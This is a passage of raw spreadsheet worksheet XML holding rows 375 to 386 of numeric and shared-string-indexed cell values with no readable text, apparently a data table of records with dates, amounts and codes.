      </c>
      <c r="AA375">
        <v>0</v>
      </c>
      <c r="AB375">
        <v>460</v>
      </c>
      <c r="AC375">
        <v>30</v>
      </c>
      <c r="AD375">
        <v>1</v>
      </c>
      <c r="AE375">
        <v>7000</v>
      </c>
      <c r="AF375" t="s">
        <v>3113</v>
      </c>
      <c r="AG375">
        <v>90241</v>
      </c>
      <c r="AH375">
        <v>26</v>
      </c>
      <c r="AJ375">
        <v>420</v>
      </c>
      <c r="AK375" t="s">
        <v>331</v>
      </c>
      <c r="AL375" t="s">
        <v>332</v>
      </c>
      <c r="AM375" t="s">
        <v>3114</v>
      </c>
      <c r="AN375" t="s">
        <v>55</v>
      </c>
      <c r="AO375">
        <v>2017</v>
      </c>
      <c r="AP375" t="s">
        <v>3115</v>
      </c>
      <c r="AQ375" t="s">
        <v>3116</v>
      </c>
      <c r="AR375" t="s">
        <v>3117</v>
      </c>
      <c r="AS375" t="s">
        <v>71</v>
      </c>
      <c r="AT375" t="s">
        <v>58</v>
      </c>
      <c r="AU375">
        <v>25</v>
      </c>
      <c r="AV375">
        <v>0</v>
      </c>
      <c r="AW375">
        <v>14</v>
      </c>
      <c r="AX375">
        <v>263</v>
      </c>
      <c r="AY375">
        <v>9</v>
      </c>
      <c r="AZ375">
        <v>7</v>
      </c>
      <c r="BA375" t="s">
        <v>17388</v>
      </c>
      <c r="BB375" t="s">
        <v>15031</v>
      </c>
      <c r="BC375" t="s">
        <v>9485</v>
      </c>
      <c r="BD375" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="376" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A376">
        <v>1318</v>
      </c>
      <c r="B376" t="s">
        <v>3118</v>
      </c>
      <c r="C376" t="s">
        <v>99</v>
      </c>
      <c r="D376" t="s">
        <v>3119</v>
      </c>
      <c r="E376" t="s">
        <v>142</v>
      </c>
      <c r="F376" t="s">
        <v>3120</v>
      </c>
      <c r="G376" s="1">
        <v>44214</v>
      </c>
      <c r="H376">
        <v>4190</v>
      </c>
      <c r="I376">
        <v>4190</v>
      </c>
      <c r="J376">
        <v>1</v>
      </c>
      <c r="K376">
        <v>0</v>
      </c>
      <c r="L376">
        <v>0</v>
      </c>
      <c r="M376">
        <v>0</v>
      </c>
      <c r="N376">
        <v>0</v>
      </c>
      <c r="O376">
        <v>0</v>
      </c>
      <c r="P376">
        <v>0</v>
      </c>
      <c r="Q376">
        <v>0</v>
      </c>
      <c r="R376">
        <v>0</v>
      </c>
      <c r="S376">
        <v>1</v>
      </c>
      <c r="T376">
        <v>0</v>
      </c>
      <c r="U376">
        <v>500</v>
      </c>
      <c r="V376">
        <v>0</v>
      </c>
      <c r="W376">
        <v>0</v>
      </c>
      <c r="X376">
        <v>0</v>
      </c>
      <c r="Y376">
        <v>0</v>
      </c>
      <c r="Z376">
        <v>0</v>
      </c>
      <c r="AA376">
        <v>0</v>
      </c>
      <c r="AB376">
        <v>0</v>
      </c>
      <c r="AC376">
        <v>0</v>
      </c>
      <c r="AD376">
        <v>1</v>
      </c>
      <c r="AE376">
        <v>0</v>
      </c>
      <c r="AF376" t="s">
        <v>3121</v>
      </c>
      <c r="AG376">
        <v>14440</v>
      </c>
      <c r="AH376">
        <v>12</v>
      </c>
      <c r="AJ376">
        <v>160</v>
      </c>
      <c r="AK376" t="s">
        <v>114</v>
      </c>
      <c r="AL376" t="s">
        <v>114</v>
      </c>
      <c r="AM376" t="s">
        <v>3122</v>
      </c>
      <c r="AN376" t="s">
        <v>55</v>
      </c>
      <c r="AO376">
        <v>2017</v>
      </c>
      <c r="AP376" t="s">
        <v>3123</v>
      </c>
      <c r="AQ376" t="s">
        <v>3124</v>
      </c>
      <c r="AR376" t="s">
        <v>3121</v>
      </c>
      <c r="AS376" t="s">
        <v>179</v>
      </c>
      <c r="AT376" t="s">
        <v>58</v>
      </c>
      <c r="AU376">
        <v>26</v>
      </c>
      <c r="AV376">
        <v>0</v>
      </c>
      <c r="AW376">
        <v>10</v>
      </c>
      <c r="AX376">
        <v>2</v>
      </c>
      <c r="AY376">
        <v>7</v>
      </c>
      <c r="AZ376">
        <v>5</v>
      </c>
      <c r="BA376" t="s">
        <v>17375</v>
      </c>
      <c r="BB376" t="s">
        <v>15197</v>
      </c>
      <c r="BC376" t="s">
        <v>12749</v>
      </c>
      <c r="BD376">
        <v>0</v>
      </c>
    </row>
    <row r="377" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A377">
        <v>1143</v>
      </c>
      <c r="B377" t="s">
        <v>3125</v>
      </c>
      <c r="C377" t="s">
        <v>157</v>
      </c>
      <c r="D377" t="s">
        <v>3126</v>
      </c>
      <c r="E377" t="s">
        <v>843</v>
      </c>
      <c r="F377" t="s">
        <v>3127</v>
      </c>
      <c r="G377" s="1">
        <v>44053</v>
      </c>
      <c r="H377">
        <v>4208</v>
      </c>
      <c r="I377">
        <v>4208</v>
      </c>
      <c r="J377">
        <v>0</v>
      </c>
      <c r="K377">
        <v>0</v>
      </c>
      <c r="L377">
        <v>0</v>
      </c>
      <c r="M377">
        <v>0</v>
      </c>
      <c r="N377">
        <v>0</v>
      </c>
      <c r="O377">
        <v>0</v>
      </c>
      <c r="P377">
        <v>0</v>
      </c>
      <c r="Q377">
        <v>1</v>
      </c>
      <c r="R377">
        <v>0</v>
      </c>
      <c r="S377">
        <v>0</v>
      </c>
      <c r="T377">
        <v>1</v>
      </c>
      <c r="U377">
        <v>0</v>
      </c>
      <c r="V377">
        <v>0</v>
      </c>
      <c r="W377">
        <v>0</v>
      </c>
      <c r="X377">
        <v>0</v>
      </c>
      <c r="Y377">
        <v>0</v>
      </c>
      <c r="Z377">
        <v>0</v>
      </c>
      <c r="AA377">
        <v>0</v>
      </c>
      <c r="AB377">
        <v>500</v>
      </c>
      <c r="AC377">
        <v>0</v>
      </c>
      <c r="AD377">
        <v>0</v>
      </c>
      <c r="AE377">
        <v>3000</v>
      </c>
      <c r="AF377" t="s">
        <v>3128</v>
      </c>
      <c r="AG377">
        <v>61253</v>
      </c>
      <c r="AH377">
        <v>16</v>
      </c>
      <c r="AJ377">
        <v>242</v>
      </c>
      <c r="AK377" t="s">
        <v>3129</v>
      </c>
      <c r="AL377" t="s">
        <v>3130</v>
      </c>
      <c r="AM377" t="s">
        <v>3131</v>
      </c>
      <c r="AN377" t="s">
        <v>68</v>
      </c>
      <c r="AO377">
        <v>2018</v>
      </c>
      <c r="AP377">
        <v>81233948685</v>
      </c>
      <c r="AQ377" t="s">
        <v>3132</v>
      </c>
      <c r="AR377" t="s">
        <v>3128</v>
      </c>
      <c r="AU377">
        <v>5</v>
      </c>
      <c r="AV377">
        <v>0</v>
      </c>
      <c r="AW377">
        <v>1</v>
      </c>
      <c r="AX377">
        <v>0</v>
      </c>
      <c r="AY377">
        <v>1</v>
      </c>
      <c r="AZ377">
        <v>1</v>
      </c>
      <c r="BA377" t="s">
        <v>16808</v>
      </c>
      <c r="BB377" t="s">
        <v>15081</v>
      </c>
      <c r="BC377">
        <v>0</v>
      </c>
      <c r="BD377" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="378" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A378">
        <v>925</v>
      </c>
      <c r="B378" t="s">
        <v>3133</v>
      </c>
      <c r="C378" t="s">
        <v>168</v>
      </c>
      <c r="D378" t="s">
        <v>3134</v>
      </c>
      <c r="E378" t="s">
        <v>142</v>
      </c>
      <c r="F378" t="s">
        <v>3135</v>
      </c>
      <c r="G378" s="1">
        <v>44057</v>
      </c>
      <c r="H378">
        <v>4226</v>
      </c>
      <c r="I378">
        <v>4226</v>
      </c>
      <c r="J378">
        <v>1</v>
      </c>
      <c r="K378">
        <v>0</v>
      </c>
      <c r="L378">
        <v>1</v>
      </c>
      <c r="M378">
        <v>3</v>
      </c>
      <c r="N378">
        <v>0</v>
      </c>
      <c r="O378">
        <v>0</v>
      </c>
      <c r="P378">
        <v>0</v>
      </c>
      <c r="Q378">
        <v>0</v>
      </c>
      <c r="R378">
        <v>0</v>
      </c>
      <c r="S378">
        <v>0</v>
      </c>
      <c r="T378">
        <v>1</v>
      </c>
      <c r="U378">
        <v>250000</v>
      </c>
      <c r="V378">
        <v>0</v>
      </c>
      <c r="W378">
        <v>4000</v>
      </c>
      <c r="X378">
        <v>1500</v>
      </c>
      <c r="Y378">
        <v>0</v>
      </c>
      <c r="Z378">
        <v>0</v>
      </c>
      <c r="AA378">
        <v>0</v>
      </c>
      <c r="AB378">
        <v>0</v>
      </c>
      <c r="AC378">
        <v>0</v>
      </c>
      <c r="AD378">
        <v>0</v>
      </c>
      <c r="AE378">
        <v>10000</v>
      </c>
      <c r="AF378" t="s">
        <v>3136</v>
      </c>
      <c r="AG378">
        <v>45123</v>
      </c>
      <c r="AH378">
        <v>13</v>
      </c>
      <c r="AJ378">
        <v>182</v>
      </c>
      <c r="AK378" t="s">
        <v>3137</v>
      </c>
      <c r="AL378" t="s">
        <v>3138</v>
      </c>
      <c r="AM378" t="s">
        <v>3139</v>
      </c>
      <c r="AN378" t="s">
        <v>55</v>
      </c>
      <c r="AO378">
        <v>2013</v>
      </c>
      <c r="AP378" t="s">
        <v>3140</v>
      </c>
      <c r="AQ378" t="s">
        <v>3141</v>
      </c>
      <c r="AR378" t="s">
        <v>3142</v>
      </c>
      <c r="AS378" t="s">
        <v>71</v>
      </c>
      <c r="AT378" t="s">
        <v>58</v>
      </c>
      <c r="AU378">
        <v>6</v>
      </c>
      <c r="AV378">
        <v>1</v>
      </c>
      <c r="AW378">
        <v>18</v>
      </c>
      <c r="AX378">
        <v>20</v>
      </c>
      <c r="AY378">
        <v>8</v>
      </c>
      <c r="AZ378">
        <v>3</v>
      </c>
      <c r="BA378" t="s">
        <v>16642</v>
      </c>
      <c r="BB378" t="s">
        <v>14939</v>
      </c>
      <c r="BC378">
        <v>0</v>
      </c>
      <c r="BD378" t="s">
        <v>11163</v>
      </c>
    </row>
    <row r="379" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A379">
        <v>946</v>
      </c>
      <c r="B379" t="s">
        <v>3143</v>
      </c>
      <c r="C379" t="s">
        <v>99</v>
      </c>
      <c r="D379" t="s">
        <v>3144</v>
      </c>
      <c r="E379" t="s">
        <v>142</v>
      </c>
      <c r="F379" t="s">
        <v>1420</v>
      </c>
      <c r="G379" s="1">
        <v>44013</v>
      </c>
      <c r="H379">
        <v>4236</v>
      </c>
      <c r="I379">
        <v>4236</v>
      </c>
      <c r="J379">
        <v>1</v>
      </c>
      <c r="K379">
        <v>0</v>
      </c>
      <c r="L379">
        <v>1</v>
      </c>
      <c r="M379">
        <v>0</v>
      </c>
      <c r="N379">
        <v>0</v>
      </c>
      <c r="O379">
        <v>0</v>
      </c>
      <c r="P379">
        <v>0</v>
      </c>
      <c r="Q379">
        <v>0</v>
      </c>
      <c r="R379">
        <v>0</v>
      </c>
      <c r="S379">
        <v>0</v>
      </c>
      <c r="T379">
        <v>1</v>
      </c>
      <c r="U379">
        <v>20000</v>
      </c>
      <c r="V379">
        <v>0</v>
      </c>
      <c r="W379">
        <v>2000</v>
      </c>
      <c r="X379">
        <v>0</v>
      </c>
      <c r="Y379">
        <v>0</v>
      </c>
      <c r="Z379">
        <v>0</v>
      </c>
      <c r="AA379">
        <v>0</v>
      </c>
      <c r="AB379">
        <v>0</v>
      </c>
      <c r="AC379">
        <v>0</v>
      </c>
      <c r="AD379">
        <v>0</v>
      </c>
      <c r="AE379">
        <v>500</v>
      </c>
      <c r="AF379" t="s">
        <v>3145</v>
      </c>
      <c r="AG379">
        <v>11440</v>
      </c>
      <c r="AH379">
        <v>12</v>
      </c>
      <c r="AJ379">
        <v>160</v>
      </c>
      <c r="AK379" t="s">
        <v>114</v>
      </c>
      <c r="AL379" t="s">
        <v>114</v>
      </c>
      <c r="AM379" t="s">
        <v>3146</v>
      </c>
      <c r="AN379" t="s">
        <v>55</v>
      </c>
      <c r="AO379">
        <v>2018</v>
      </c>
      <c r="AP379" t="s">
        <v>3147</v>
      </c>
      <c r="AQ379" t="s">
        <v>3148</v>
      </c>
      <c r="AR379" t="s">
        <v>3149</v>
      </c>
      <c r="AS379" t="s">
        <v>71</v>
      </c>
      <c r="AT379" t="s">
        <v>58</v>
      </c>
      <c r="AU379">
        <v>6</v>
      </c>
      <c r="AV379">
        <v>1</v>
      </c>
      <c r="AW379">
        <v>0</v>
      </c>
      <c r="AX379">
        <v>0</v>
      </c>
      <c r="AY379">
        <v>7</v>
      </c>
      <c r="AZ379">
        <v>3</v>
      </c>
      <c r="BA379">
        <v>0</v>
      </c>
      <c r="BB379" t="s">
        <v>14956</v>
      </c>
      <c r="BC379">
        <v>0</v>
      </c>
      <c r="BD379" t="s">
        <v>9805</v>
      </c>
    </row>
    <row r="380" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A380">
        <v>895</v>
      </c>
      <c r="B380" t="s">
        <v>3150</v>
      </c>
      <c r="C380" t="s">
        <v>157</v>
      </c>
      <c r="D380" t="s">
        <v>1891</v>
      </c>
      <c r="E380" t="s">
        <v>142</v>
      </c>
      <c r="F380" t="s">
        <v>3151</v>
      </c>
      <c r="G380" s="1">
        <v>44048</v>
      </c>
      <c r="H380">
        <v>4261</v>
      </c>
      <c r="I380">
        <v>4261</v>
      </c>
      <c r="J380">
        <v>1</v>
      </c>
      <c r="K380">
        <v>0</v>
      </c>
      <c r="L380">
        <v>0</v>
      </c>
      <c r="M380">
        <v>0</v>
      </c>
      <c r="N380">
        <v>0</v>
      </c>
      <c r="O380">
        <v>0</v>
      </c>
      <c r="P380">
        <v>0</v>
      </c>
      <c r="Q380">
        <v>2</v>
      </c>
      <c r="R380">
        <v>25</v>
      </c>
      <c r="S380">
        <v>1</v>
      </c>
      <c r="T380">
        <v>0</v>
      </c>
      <c r="U380">
        <v>100000</v>
      </c>
      <c r="V380">
        <v>0</v>
      </c>
      <c r="W380">
        <v>0</v>
      </c>
      <c r="X380">
        <v>0</v>
      </c>
      <c r="Y380">
        <v>0</v>
      </c>
      <c r="Z380">
        <v>0</v>
      </c>
      <c r="AA380">
        <v>0</v>
      </c>
      <c r="AB380">
        <v>500</v>
      </c>
      <c r="AC380">
        <v>25000</v>
      </c>
      <c r="AD380">
        <v>1</v>
      </c>
      <c r="AE380">
        <v>0</v>
      </c>
      <c r="AF380" t="s">
        <v>1893</v>
      </c>
      <c r="AG380">
        <v>61254</v>
      </c>
      <c r="AH380">
        <v>16</v>
      </c>
      <c r="AJ380">
        <v>242</v>
      </c>
      <c r="AK380" t="s">
        <v>490</v>
      </c>
      <c r="AL380" t="s">
        <v>3152</v>
      </c>
      <c r="AM380" t="s">
        <v>3153</v>
      </c>
      <c r="AN380" t="s">
        <v>82</v>
      </c>
      <c r="AO380">
        <v>1978</v>
      </c>
      <c r="AP380" t="s">
        <v>3154</v>
      </c>
      <c r="AQ380" t="s">
        <v>1897</v>
      </c>
      <c r="AR380" t="s">
        <v>3155</v>
      </c>
      <c r="AS380" t="s">
        <v>71</v>
      </c>
      <c r="AT380" t="s">
        <v>86</v>
      </c>
      <c r="AU380">
        <v>26</v>
      </c>
      <c r="AV380">
        <v>1</v>
      </c>
      <c r="AW380">
        <v>25</v>
      </c>
      <c r="AX380">
        <v>45</v>
      </c>
      <c r="AY380">
        <v>18</v>
      </c>
      <c r="AZ380">
        <v>25</v>
      </c>
      <c r="BA380" t="s">
        <v>16646</v>
      </c>
      <c r="BB380" t="s">
        <v>14410</v>
      </c>
      <c r="BC380">
        <v>0</v>
      </c>
      <c r="BD380" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="381" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A381">
        <v>1117</v>
      </c>
      <c r="B381" t="s">
        <v>3156</v>
      </c>
      <c r="C381" t="s">
        <v>157</v>
      </c>
      <c r="D381" t="s">
        <v>3157</v>
      </c>
      <c r="E381" t="s">
        <v>111</v>
      </c>
      <c r="F381" t="s">
        <v>3158</v>
      </c>
      <c r="G381" s="1">
        <v>44090</v>
      </c>
      <c r="H381">
        <v>4281</v>
      </c>
      <c r="I381">
        <v>4281</v>
      </c>
      <c r="J381">
        <v>1</v>
      </c>
      <c r="K381">
        <v>1</v>
      </c>
      <c r="L381">
        <v>1</v>
      </c>
      <c r="M381">
        <v>1</v>
      </c>
      <c r="N381">
        <v>0</v>
      </c>
      <c r="O381">
        <v>0</v>
      </c>
      <c r="P381">
        <v>0</v>
      </c>
      <c r="Q381">
        <v>2</v>
      </c>
      <c r="R381">
        <v>20</v>
      </c>
      <c r="S381">
        <v>1</v>
      </c>
      <c r="T381">
        <v>0</v>
      </c>
      <c r="U381">
        <v>500</v>
      </c>
      <c r="V381">
        <v>1</v>
      </c>
      <c r="W381">
        <v>300</v>
      </c>
      <c r="X381">
        <v>200</v>
      </c>
      <c r="Y381">
        <v>0</v>
      </c>
      <c r="Z381">
        <v>0</v>
      </c>
      <c r="AA381">
        <v>0</v>
      </c>
      <c r="AB381">
        <v>100</v>
      </c>
      <c r="AC381">
        <v>500</v>
      </c>
      <c r="AD381">
        <v>1</v>
      </c>
      <c r="AE381">
        <v>0</v>
      </c>
      <c r="AF381" t="s">
        <v>3159</v>
      </c>
      <c r="AG381">
        <v>61253</v>
      </c>
      <c r="AH381">
        <v>16</v>
      </c>
      <c r="AJ381">
        <v>242</v>
      </c>
      <c r="AK381" t="s">
        <v>3129</v>
      </c>
      <c r="AL381" t="s">
        <v>3160</v>
      </c>
      <c r="AM381" t="s">
        <v>3161</v>
      </c>
      <c r="AN381" t="s">
        <v>55</v>
      </c>
      <c r="AO381">
        <v>2018</v>
      </c>
      <c r="AP381">
        <v>318013499</v>
      </c>
      <c r="AQ381" t="s">
        <v>3162</v>
      </c>
      <c r="AR381" t="s">
        <v>3163</v>
      </c>
      <c r="AS381" t="s">
        <v>71</v>
      </c>
      <c r="AT381" t="s">
        <v>58</v>
      </c>
      <c r="AU381">
        <v>26</v>
      </c>
      <c r="AV381">
        <v>1</v>
      </c>
      <c r="AW381">
        <v>0</v>
      </c>
      <c r="AX381">
        <v>0</v>
      </c>
      <c r="AY381">
        <v>6</v>
      </c>
      <c r="AZ381">
        <v>2</v>
      </c>
      <c r="BA381" t="s">
        <v>16802</v>
      </c>
      <c r="BB381" t="s">
        <v>14785</v>
      </c>
      <c r="BC381">
        <v>0</v>
      </c>
      <c r="BD381" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="382" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A382">
        <v>963</v>
      </c>
      <c r="B382" t="s">
        <v>3164</v>
      </c>
      <c r="C382" t="s">
        <v>3165</v>
      </c>
      <c r="D382" t="s">
        <v>3166</v>
      </c>
      <c r="E382" t="s">
        <v>363</v>
      </c>
      <c r="F382" t="s">
        <v>3167</v>
      </c>
      <c r="G382" s="1">
        <v>44048</v>
      </c>
      <c r="H382">
        <v>4320</v>
      </c>
      <c r="I382">
        <v>4320</v>
      </c>
      <c r="J382">
        <v>0</v>
      </c>
      <c r="K382">
        <v>0</v>
      </c>
      <c r="L382">
        <v>0</v>
      </c>
      <c r="M382">
        <v>0</v>
      </c>
      <c r="N382">
        <v>0</v>
      </c>
      <c r="O382">
        <v>0</v>
      </c>
      <c r="P382">
        <v>0</v>
      </c>
      <c r="Q382">
        <v>0</v>
      </c>
      <c r="R382">
        <v>0</v>
      </c>
      <c r="S382">
        <v>0</v>
      </c>
      <c r="T382">
        <v>1</v>
      </c>
      <c r="U382">
        <v>0</v>
      </c>
      <c r="V382">
        <v>0</v>
      </c>
      <c r="W382">
        <v>0</v>
      </c>
      <c r="X382">
        <v>0</v>
      </c>
      <c r="Y382">
        <v>0</v>
      </c>
      <c r="Z382">
        <v>0</v>
      </c>
      <c r="AA382">
        <v>0</v>
      </c>
      <c r="AB382">
        <v>0</v>
      </c>
      <c r="AC382">
        <v>0</v>
      </c>
      <c r="AD382">
        <v>0</v>
      </c>
      <c r="AE382">
        <v>300</v>
      </c>
      <c r="AF382" t="s">
        <v>3168</v>
      </c>
      <c r="AG382">
        <v>99615</v>
      </c>
      <c r="AH382">
        <v>34</v>
      </c>
      <c r="AJ382">
        <v>486</v>
      </c>
      <c r="AK382" t="s">
        <v>3169</v>
      </c>
      <c r="AL382" t="s">
        <v>3169</v>
      </c>
      <c r="AM382" t="s">
        <v>3170</v>
      </c>
      <c r="AN382" t="s">
        <v>55</v>
      </c>
      <c r="AO382">
        <v>2018</v>
      </c>
      <c r="AP382">
        <v>81314142109</v>
      </c>
      <c r="AQ382">
        <v>81314142109</v>
      </c>
      <c r="AR382" t="s">
        <v>3168</v>
      </c>
      <c r="AS382" t="s">
        <v>71</v>
      </c>
      <c r="AT382" t="s">
        <v>58</v>
      </c>
      <c r="AU382">
        <v>24</v>
      </c>
      <c r="AV382">
        <v>0</v>
      </c>
      <c r="AW382">
        <v>0</v>
      </c>
      <c r="AX382">
        <v>0</v>
      </c>
      <c r="AY382">
        <v>5</v>
      </c>
      <c r="AZ382">
        <v>2</v>
      </c>
      <c r="BA382" t="s">
        <v>17411</v>
      </c>
      <c r="BB382" t="s">
        <v>14966</v>
      </c>
      <c r="BC382" t="s">
        <v>11254</v>
      </c>
      <c r="BD382" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="383" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A383">
        <v>1156</v>
      </c>
      <c r="B383" t="s">
        <v>3171</v>
      </c>
      <c r="C383" t="s">
        <v>60</v>
      </c>
      <c r="D383" t="s">
        <v>3172</v>
      </c>
      <c r="E383" t="s">
        <v>142</v>
      </c>
      <c r="F383" t="s">
        <v>3173</v>
      </c>
      <c r="G383" s="1">
        <v>44019</v>
      </c>
      <c r="H383">
        <v>4336</v>
      </c>
      <c r="I383">
        <v>4336</v>
      </c>
      <c r="J383">
        <v>3</v>
      </c>
      <c r="K383">
        <v>0</v>
      </c>
      <c r="L383">
        <v>0</v>
      </c>
      <c r="M383">
        <v>1</v>
      </c>
      <c r="N383">
        <v>200</v>
      </c>
      <c r="O383">
        <v>0</v>
      </c>
      <c r="P383">
        <v>0</v>
      </c>
      <c r="Q383">
        <v>8</v>
      </c>
      <c r="R383">
        <v>46</v>
      </c>
      <c r="S383">
        <v>0</v>
      </c>
      <c r="T383">
        <v>0</v>
      </c>
      <c r="U383">
        <v>84697</v>
      </c>
      <c r="V383">
        <v>0</v>
      </c>
      <c r="W383">
        <v>0</v>
      </c>
      <c r="X383">
        <v>594</v>
      </c>
      <c r="Y383">
        <v>0</v>
      </c>
      <c r="Z383">
        <v>0</v>
      </c>
      <c r="AA383">
        <v>0</v>
      </c>
      <c r="AB383">
        <v>500</v>
      </c>
      <c r="AC383">
        <v>250</v>
      </c>
      <c r="AD383">
        <v>0</v>
      </c>
      <c r="AE383">
        <v>0</v>
      </c>
      <c r="AF383" t="s">
        <v>3174</v>
      </c>
      <c r="AG383">
        <v>35122</v>
      </c>
      <c r="AH383">
        <v>10</v>
      </c>
      <c r="AJ383">
        <v>128</v>
      </c>
      <c r="AK383" t="s">
        <v>65</v>
      </c>
      <c r="AL383" t="s">
        <v>3175</v>
      </c>
      <c r="AM383" t="s">
        <v>3176</v>
      </c>
      <c r="AN383" t="s">
        <v>82</v>
      </c>
      <c r="AO383">
        <v>2001</v>
      </c>
      <c r="AP383">
        <f>62721-350383</f>
        <v>-287662</v>
      </c>
      <c r="AQ383" t="s">
        <v>3177</v>
      </c>
      <c r="AR383" t="s">
        <v>3178</v>
      </c>
      <c r="AS383" t="s">
        <v>71</v>
      </c>
      <c r="AT383" t="s">
        <v>86</v>
      </c>
      <c r="AU383">
        <v>6</v>
      </c>
      <c r="AV383">
        <v>2</v>
      </c>
      <c r="AW383">
        <v>88</v>
      </c>
      <c r="AX383">
        <v>479</v>
      </c>
      <c r="AY383">
        <v>56</v>
      </c>
      <c r="AZ383">
        <v>51</v>
      </c>
      <c r="BA383" t="s">
        <v>17400</v>
      </c>
      <c r="BB383" t="s">
        <v>15089</v>
      </c>
      <c r="BC383" t="s">
        <v>9870</v>
      </c>
      <c r="BD383" t="s">
        <v>9712</v>
      </c>
    </row>
    <row r="384" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A384">
        <v>909</v>
      </c>
      <c r="B384" t="s">
        <v>3179</v>
      </c>
      <c r="C384" t="s">
        <v>99</v>
      </c>
      <c r="D384" t="s">
        <v>3180</v>
      </c>
      <c r="E384" t="s">
        <v>111</v>
      </c>
      <c r="F384" t="s">
        <v>3181</v>
      </c>
      <c r="G384" s="1">
        <v>44088</v>
      </c>
      <c r="H384">
        <v>4341</v>
      </c>
      <c r="I384">
        <v>4341</v>
      </c>
      <c r="J384">
        <v>1</v>
      </c>
      <c r="K384">
        <v>1</v>
      </c>
      <c r="L384">
        <v>0</v>
      </c>
      <c r="M384">
        <v>0</v>
      </c>
      <c r="N384">
        <v>0</v>
      </c>
      <c r="O384">
        <v>0</v>
      </c>
      <c r="P384">
        <v>0</v>
      </c>
      <c r="Q384">
        <v>0</v>
      </c>
      <c r="R384">
        <v>0</v>
      </c>
      <c r="S384">
        <v>0</v>
      </c>
      <c r="T384">
        <v>0</v>
      </c>
      <c r="U384">
        <v>150000</v>
      </c>
      <c r="V384">
        <v>75000</v>
      </c>
      <c r="W384">
        <v>0</v>
      </c>
      <c r="X384">
        <v>0</v>
      </c>
      <c r="Y384">
        <v>0</v>
      </c>
      <c r="Z384">
        <v>0</v>
      </c>
      <c r="AA384">
        <v>0</v>
      </c>
      <c r="AB384">
        <v>0</v>
      </c>
      <c r="AC384">
        <v>0</v>
      </c>
      <c r="AD384">
        <v>0</v>
      </c>
      <c r="AE384">
        <v>0</v>
      </c>
      <c r="AF384" t="s">
        <v>3182</v>
      </c>
      <c r="AG384">
        <v>11720</v>
      </c>
      <c r="AH384">
        <v>12</v>
      </c>
      <c r="AJ384">
        <v>159</v>
      </c>
      <c r="AK384" t="s">
        <v>405</v>
      </c>
      <c r="AL384" t="s">
        <v>766</v>
      </c>
      <c r="AM384" t="s">
        <v>3183</v>
      </c>
      <c r="AN384" t="s">
        <v>55</v>
      </c>
      <c r="AO384">
        <v>2005</v>
      </c>
      <c r="AP384" t="s">
        <v>3184</v>
      </c>
      <c r="AQ384" t="s">
        <v>3185</v>
      </c>
      <c r="AR384" t="s">
        <v>3186</v>
      </c>
      <c r="AS384" t="s">
        <v>71</v>
      </c>
      <c r="AT384" t="s">
        <v>58</v>
      </c>
      <c r="AU384">
        <v>26</v>
      </c>
      <c r="AV384">
        <v>1</v>
      </c>
      <c r="AW384">
        <v>0</v>
      </c>
      <c r="AX384">
        <v>0</v>
      </c>
      <c r="AY384">
        <v>3</v>
      </c>
      <c r="AZ384">
        <v>1</v>
      </c>
      <c r="BA384" t="s">
        <v>17397</v>
      </c>
      <c r="BB384" t="s">
        <v>14930</v>
      </c>
      <c r="BC384" t="s">
        <v>10031</v>
      </c>
      <c r="BD384">
        <v>0</v>
      </c>
    </row>
    <row r="385" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A385">
        <v>1435</v>
      </c>
      <c r="B385" t="s">
        <v>3187</v>
      </c>
      <c r="C385" t="s">
        <v>157</v>
      </c>
      <c r="D385" t="s">
        <v>3188</v>
      </c>
      <c r="E385" t="s">
        <v>528</v>
      </c>
      <c r="F385" t="s">
        <v>3189</v>
      </c>
      <c r="G385" s="1">
        <v>44302</v>
      </c>
      <c r="H385">
        <v>4352</v>
      </c>
      <c r="I385">
        <v>4352</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t="s">
        <v>3190</v>
      </c>
      <c r="AG385">
        <v>61219</v>
      </c>
      <c r="AH385">
        <v>16</v>
      </c>
      <c r="AJ385">
        <v>242</v>
      </c>
      <c r="AK385" t="s">
        <v>1894</v>
      </c>
      <c r="AL385" t="s">
        <v>1895</v>
      </c>
      <c r="AM385" t="s">
        <v>3191</v>
      </c>
      <c r="AN385" t="s">
        <v>82</v>
      </c>
      <c r="AO385">
        <v>1976</v>
      </c>
      <c r="AP385" t="s">
        <v>3192</v>
      </c>
      <c r="AQ385" t="s">
        <v>3193</v>
      </c>
      <c r="AR385" t="s">
        <v>3194</v>
      </c>
      <c r="AS385" t="s">
        <v>71</v>
      </c>
      <c r="AT385" t="s">
        <v>86</v>
      </c>
      <c r="AU385">
        <v>26</v>
      </c>
      <c r="AV385">
        <v>3</v>
      </c>
      <c r="AW385">
        <v>0</v>
      </c>
      <c r="AX385">
        <v>0</v>
      </c>
      <c r="AY385">
        <v>140</v>
      </c>
      <c r="AZ385">
        <v>190</v>
      </c>
      <c r="BA385" t="s">
        <v>16889</v>
      </c>
      <c r="BB385" t="s">
        <v>15274</v>
      </c>
      <c r="BC385">
        <v>0</v>
      </c>
      <c r="BD385" t="s">
        <v>11702</v>
      </c>
    </row>
    <row r="386" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A386">
        <v>1155</v>
      </c>
      <c r="B386" t="s">
        <v>3195</v>
      </c>
      <c r="C386" t="s">
        <v>60</v>
      </c>
      <c r="D386" t="s">
        <v>3196</v>
      </c>
      <c r="E386" t="s">
        <v>142</v>
      </c>
      <c r="F386" t="s">
        <v>3197</v>
      </c>
      <c r="G386" s="1">
        <v>44019</v>
      </c>
      <c r="H386">
        <v>4416</v>
      </c>
      <c r="I386">
        <v>4416</v>
      </c>
      <c r="J386">
        <v>2</v>
      </c>
      <c r="K386">
        <v>0</v>
      </c>
      <c r="L386">
        <v>0</v>
      </c>
      <c r="M386">
        <v>2</v>
      </c>
      <c r="N386">
        <v>1800</v>
      </c>
      <c r="O386">
        <v>0</v>
      </c>
      <c r="P386">
        <v>0</v>
      </c>
      <c r="Q386">
        <v>8</v>
      </c>
      <c r="R386">
        <v>110</v>
      </c>
      <c r="S386">
        <v>0</v>
      </c>
